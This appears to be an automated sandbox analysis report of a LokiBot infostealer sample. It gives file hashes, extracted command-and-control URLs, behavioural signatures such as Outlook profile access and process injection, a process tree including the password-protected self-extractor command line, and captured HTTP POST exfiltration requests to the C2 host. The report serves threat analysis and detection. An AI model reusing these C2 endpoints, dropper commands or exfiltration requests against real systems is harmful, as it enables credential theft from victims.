Analysis
-
max time kernel
141s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09-12-2024 02:10
Static task
static1
Behavioral task
behavioral1
Sample
3439eaffe1dfd634b46a29ee7f0e938b5b05f9c784123a70b94f9f46aa370381.exe
Resource
win7-20240903-en
General
-
Target
3439eaffe1dfd634b46a29ee7f0e938b5b05f9c784123a70b94f9f46aa370381.exe
-
Size
733KB
-
MD5
c27bf6db51f64901ba56cf64003cabd2
-
SHA1
005e61ccfa9a0840d788bcff2a95cff7ec88d6db
-
SHA256
3439eaffe1dfd634b46a29ee7f0e938b5b05f9c784123a70b94f9f46aa370381
-
SHA512
1b3b19272c1d0ae7be07b4be04fbcc58e46b9fedeb31a4292bd3e8a270a2deee22efdd9891a26e708ac5d987b6996cefdac64665a685f52cbfcd54e66eb1d443
-
SSDEEP
12288:WcrNS33L10QdrX2mVnCGoe0cZKqMEF0JCEharfH0uceMTLlW44UdLZeZ:FNA3R5drXbVCGoRcZDMEwC9UucrjLc
Malware Config
Extracted
lokibot
https://www.stipamana.com/dftjedrshyyj/Panel/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Lokibot family
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation 3439eaffe1dfd634b46a29ee7f0e938b5b05f9c784123a70b94f9f46aa370381.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation segzs.sfx.exe -
Executes dropped EXE 5 IoCs
pid Process 4552 segzs.sfx.exe 5104 segzs.exe 3024 segzs.exe 3984 segzs.exe 4132 segzs.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook segzs.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook segzs.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook segzs.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 5104 set thread context of 3024 5104 segzs.exe 89 PID 5104 set thread context of 3984 5104 segzs.exe 90 PID 5104 set thread context of 4132 5104 segzs.exe 91 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 15 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3439eaffe1dfd634b46a29ee7f0e938b5b05f9c784123a70b94f9f46aa370381.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language segzs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language segzs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language segzs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AcroRd32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language segzs.sfx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language segzs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings 3439eaffe1dfd634b46a29ee7f0e938b5b05f9c784123a70b94f9f46aa370381.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 836 AcroRd32.exe 836 AcroRd32.exe 836 AcroRd32.exe 836 AcroRd32.exe 836 AcroRd32.exe 836 AcroRd32.exe 836 AcroRd32.exe 836 AcroRd32.exe 836 AcroRd32.exe 836 AcroRd32.exe 836 AcroRd32.exe 836 AcroRd32.exe 836 AcroRd32.exe 836 AcroRd32.exe 836 AcroRd32.exe 836 AcroRd32.exe 836 AcroRd32.exe 836 AcroRd32.exe 836 AcroRd32.exe 836 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 5104 segzs.exe Token: SeDebugPrivilege 3024 segzs.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 836 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 836 AcroRd32.exe 836 AcroRd32.exe 836 AcroRd32.exe 836 AcroRd32.exe 836 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1320 wrote to memory of 3848 1320 3439eaffe1dfd634b46a29ee7f0e938b5b05f9c784123a70b94f9f46aa370381.exe 83 PID 1320 wrote to memory of 3848 1320 3439eaffe1dfd634b46a29ee7f0e938b5b05f9c784123a70b94f9f46aa370381.exe 83 PID 1320 wrote to memory of 3848 1320 3439eaffe1dfd634b46a29ee7f0e938b5b05f9c784123a70b94f9f46aa370381.exe 83 PID 1320 wrote to memory of 836 1320 3439eaffe1dfd634b46a29ee7f0e938b5b05f9c784123a70b94f9f46aa370381.exe 86 PID 1320 wrote to memory of 836 1320 3439eaffe1dfd634b46a29ee7f0e938b5b05f9c784123a70b94f9f46aa370381.exe 86 PID 1320 wrote to memory of 836 1320 3439eaffe1dfd634b46a29ee7f0e938b5b05f9c784123a70b94f9f46aa370381.exe 86 PID 3848 wrote to memory of 4552 3848 cmd.exe 87 PID 3848 wrote to memory of 4552 3848 cmd.exe 87 PID 3848 wrote to memory of 4552 3848 cmd.exe 87 PID 4552 wrote to memory of 5104 4552 segzs.sfx.exe 88 PID 4552 wrote to memory of 5104 4552 segzs.sfx.exe 88 PID 4552 wrote to memory of 5104 4552 segzs.sfx.exe 88 PID 5104 wrote to memory of 3024 5104 segzs.exe 89 PID 5104 wrote to memory of 3024 5104 segzs.exe 89 PID 5104 wrote to memory of 3024 5104 segzs.exe 89 PID 5104 wrote to memory of 3024 5104 segzs.exe 89 PID 5104 wrote to memory of 3024 5104 segzs.exe 89 PID 5104 wrote to memory of 3024 5104 segzs.exe 89 PID 5104 wrote to memory of 3024 5104 segzs.exe 89 PID 5104 wrote to memory of 3024 5104 segzs.exe 89 PID 5104 wrote to memory of 3024 5104 segzs.exe 89 PID 5104 wrote to memory of 3984 5104 segzs.exe 90 PID 5104 wrote to memory of 3984 5104 segzs.exe 90 PID 5104 wrote to memory of 3984 5104 segzs.exe 90 PID 5104 wrote to memory of 3984 5104 segzs.exe 90 PID 5104 wrote to memory of 3984 5104 segzs.exe 90 PID 5104 wrote to memory of 3984 5104 segzs.exe 90 PID 5104 wrote to memory of 3984 5104 segzs.exe 90 PID 5104 wrote to memory of 3984 5104 segzs.exe 90 PID 5104 wrote to memory of 3984 5104 segzs.exe 90 PID 5104 wrote to memory of 4132 5104 segzs.exe 91 PID 5104 wrote to memory of 4132 5104 segzs.exe 91 PID 5104 wrote to memory of 4132 5104 segzs.exe 91 PID 5104 wrote to memory of 4132 5104 segzs.exe 91 PID 5104 wrote to memory of 4132 5104 segzs.exe 91 PID 5104 wrote to memory of 4132 5104 segzs.exe 91 PID 5104 wrote to memory of 4132 5104 segzs.exe 91 PID 5104 wrote to memory of 4132 5104 segzs.exe 91 PID 5104 wrote to memory of 4132 5104 segzs.exe 91 PID 836 wrote to memory of 1852 836 AcroRd32.exe 92 PID 836 wrote to memory of 1852 836 AcroRd32.exe 92 PID 836 wrote to memory of 1852 836 AcroRd32.exe 92 PID 1852 wrote to memory of 4432 1852 RdrCEF.exe 93 PID 1852 wrote to memory of 4432 1852 RdrCEF.exe 93 PID 1852 wrote to memory of 4432 1852 RdrCEF.exe 93 PID 1852 wrote to memory of 4432 1852 RdrCEF.exe 93 PID 1852 wrote to memory of 4432 1852 RdrCEF.exe 93 PID 1852 wrote to memory of 4432 1852 RdrCEF.exe 93 PID 1852 wrote to memory of 4432 1852 RdrCEF.exe 93 PID 1852 wrote to memory of 4432 1852 RdrCEF.exe 93 PID 1852 wrote to memory of 4432 1852 RdrCEF.exe 93 PID 1852 wrote to memory of 4432 1852 RdrCEF.exe 93 PID 1852 wrote to memory of 4432 1852 RdrCEF.exe 93 PID 1852 wrote to memory of 4432 1852 RdrCEF.exe 93 PID 1852 wrote to memory of 4432 1852 RdrCEF.exe 93 PID 1852 wrote to memory of 4432 1852 RdrCEF.exe 93 PID 1852 wrote to memory of 4432 1852 RdrCEF.exe 93 PID 1852 wrote to memory of 4432 1852 RdrCEF.exe 93 PID 1852 wrote to memory of 4432 1852 RdrCEF.exe 93 PID 1852 wrote to memory of 4432 1852 RdrCEF.exe 93 PID 1852 wrote to memory of 4432 1852 RdrCEF.exe 93 PID 1852 wrote to memory of 4432 1852 RdrCEF.exe 93 PID 1852 wrote to memory of 4432 1852 RdrCEF.exe 93 PID 1852 wrote to memory of 4432 1852 RdrCEF.exe 93 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook segzs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook segzs.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3439eaffe1dfd634b46a29ee7f0e938b5b05f9c784123a70b94f9f46aa370381.exe"C:\Users\Admin\AppData\Local\Temp\3439eaffe1dfd634b46a29ee7f0e938b5b05f9c784123a70b94f9f46aa370381.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1320 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\sfgdf.bat" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3848 -
C:\Users\Admin\AppData\Roaming\segzs.sfx.exesegzs.sfx.exe -pgeyhrntdeszopthnymkdetyuhngfszafupbodcsyRhvqxsdfHbgnmeL -dC:\Users\Admin\AppData\Roaming3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4552 -
C:\Users\Admin\AppData\Roaming\segzs.exe"C:\Users\Admin\AppData\Roaming\segzs.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5104 -
C:\Users\Admin\AppData\Roaming\segzs.exeC:\Users\Admin\AppData\Roaming\segzs.exe5⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3024
-
-
C:\Users\Admin\AppData\Roaming\segzs.exeC:\Users\Admin\AppData\Roaming\segzs.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3984
-
-
C:\Users\Admin\AppData\Roaming\segzs.exeC:\Users\Admin\AppData\Roaming\segzs.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4132
-
-
-
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\mts103swift.pdf"2⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140433⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F2DABF2F9771C9F79E2E1779CBC283EB --mojo-platform-channel-handle=1772 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵
- System Location Discovery: System Language Discovery
PID:4432
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=2D6E0ABBBA48D6619C60411136957E31 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=2D6E0ABBBA48D6619C60411136957E31 --renderer-client-id=2 --mojo-platform-channel-handle=1792 --allow-no-sandbox-job /prefetch:14⤵
- System Location Discovery: System Language Discovery
PID:3384
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3F095C7917672CB9017E7233E55D736C --mojo-platform-channel-handle=2344 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵
- System Location Discovery: System Language Discovery
PID:1068
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0ED2A05758D7937368FBDBBDB827BAAB --mojo-platform-channel-handle=1956 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵
- System Location Discovery: System Language Discovery
PID:756
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=D693F4AF69D6E159693028C372B50A4C --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=D693F4AF69D6E159693028C372B50A4C --renderer-client-id=6 --mojo-platform-channel-handle=2364 --allow-no-sandbox-job /prefetch:14⤵
- System Location Discovery: System Language Discovery
PID:508
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=EEDD69F4440B00572181E8882399985A --mojo-platform-channel-handle=2564 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵
- System Location Discovery: System Language Discovery
PID:5088
-
-
-
Network
-
Remote address:8.8.8.8:53Request209.205.72.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request20.49.80.91.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request76.32.126.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestwww.stipamana.comIN AResponsewww.stipamana.comIN A87.121.86.205
-
Remote address:87.121.86.205:80RequestPOST /dftjedrshyyj/Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.stipamana.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 78FD62C
Content-Length: 358
Connection: close
ResponseHTTP/1.1 404 Not Found
Date: Mon, 09 Dec 2024 02:10:25 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 229
Connection: close
-
Remote address:87.121.86.205:80RequestPOST /dftjedrshyyj/Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.stipamana.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 78FD62C
Content-Length: 180
Connection: close
ResponseHTTP/1.1 404 Not Found
Date: Mon, 09 Dec 2024 02:10:25 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 229
Connection: close
-
Remote address:87.121.86.205:80RequestPOST /dftjedrshyyj/Panel/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.stipamana.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 78FD62C
Content-Length: 153
Connection: close
ResponseHTTP/1.1 404 Not Found
Date: Mon, 09 Dec 2024 02:10:26 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 229
Connection: close
-
Remote address:8.8.8.8:53Request95.221.229.192.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request205.86.121.87.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request177.192.25.184.in-addr.arpaIN PTRResponse177.192.25.184.in-addr.arpaIN PTRa184-25-192-177deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request58.55.71.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request59.139.73.23.in-addr.arpaIN PTRResponse59.139.73.23.in-addr.arpaIN PTRa23-73-139-59deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request197.87.175.4.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request15.164.165.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request21.49.80.91.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request133.130.81.91.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request43.229.111.52.in-addr.arpaIN PTRResponse
-
888 B 644 B 6 6
HTTP Request
POST http://www.stipamana.com/dftjedrshyyj/Panel/five/fre.phpHTTP Response
404 -
710 B 644 B 6 6
HTTP Request
POST http://www.stipamana.com/dftjedrshyyj/Panel/five/fre.phpHTTP Response
404 -
683 B 644 B 6 6
HTTP Request
POST http://www.stipamana.com/dftjedrshyyj/Panel/five/fre.phpHTTP Response
404
-
72 B 158 B 1 1
DNS Request
209.205.72.20.in-addr.arpa
-
70 B 145 B 1 1
DNS Request
20.49.80.91.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
76.32.126.40.in-addr.arpa
-
63 B 79 B 1 1
DNS Request
www.stipamana.com
DNS Response
87.121.86.205
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
72 B 132 B 1 1
DNS Request
205.86.121.87.in-addr.arpa
-
73 B 139 B 1 1
DNS Request
177.192.25.184.in-addr.arpa
-
70 B 144 B 1 1
DNS Request
58.55.71.13.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
59.139.73.23.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
197.87.175.4.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
15.164.165.52.in-addr.arpa
-
70 B 145 B 1 1
DNS Request
21.49.80.91.in-addr.arpa
-
72 B 147 B 1 1
DNS Request
133.130.81.91.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
43.229.111.52.in-addr.arpa
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5b30d3becc8731792523d599d949e63f5
SHA119350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e
-
Filesize
56KB
MD5752a1f26b18748311b691c7d8fc20633
SHA1c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
-
Filesize
64KB
MD53970de482154391d7acd9b2c5ce0622c
SHA18405549bce2618575716c528e726cb98c6200ae7
SHA256e3ef2399fdee9a145f7298d1f85616f8ca54ec84f82970f80747a2b86ff490b4
SHA51285b6c9606fa1c8b2346ecb387c55446b774368a0919af60c84a934129c0fc03ab9c254800ba517cc6ed2e76e61ec2782dc0847447c765ce38e37d3fb0b1c0cb9
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3350944739-639801879-157714471-1000\0f5007522459c86e95ffcc62f32308f1_dd2803c7-d377-4f06-bdfe-aea230fc7b0e
Filesize46B
MD5d898504a722bff1524134c6ab6a5eaa5
